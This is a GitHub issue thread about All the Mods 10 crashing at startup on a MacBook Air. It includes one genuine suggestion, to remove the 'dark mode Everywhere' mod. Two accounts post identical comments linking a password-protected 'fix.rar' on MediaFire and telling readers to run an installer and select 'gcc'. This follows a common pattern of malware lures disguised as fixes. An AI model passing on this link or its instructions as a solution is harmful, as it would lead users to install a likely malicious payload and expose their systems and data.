### ISSUE TITLE
[Crash]: Game initialization -> Cannot get config value before config is loaded...

### ISSUE THREAD

**Issue by eckfeu** [AllTheMods/ATM-10#349]
### Possible Fixes

Yes

### Modpack Version

All the Mods 10-0.40

### What happened?

Hello, I know it's a bit unusual but I'm playing the modpack on my MacBook AIR (and have been doing so for about a month now). The problem only occurs from version "All the Mods 10-0.37" (so also versions 38, 39 and 40...). When I press play from the Minecraft launcher, it goes to the red loading screen (also goes through a few steps) and then crashes.

If you solve my problem soon, I'll leave you a 5€ donation as a thank you :)

Greetings, eckfeu

### Crash Log

https://gist.github.com/eckfeu/13752cf1a143fe654d2de17d20ea91d8

**Comment by OtakuFra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Mitchell5200** [comment]
Crash seems related to dark mode Everywhere, you can just remove that mod if you choose

**Comment by Taiga-A** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
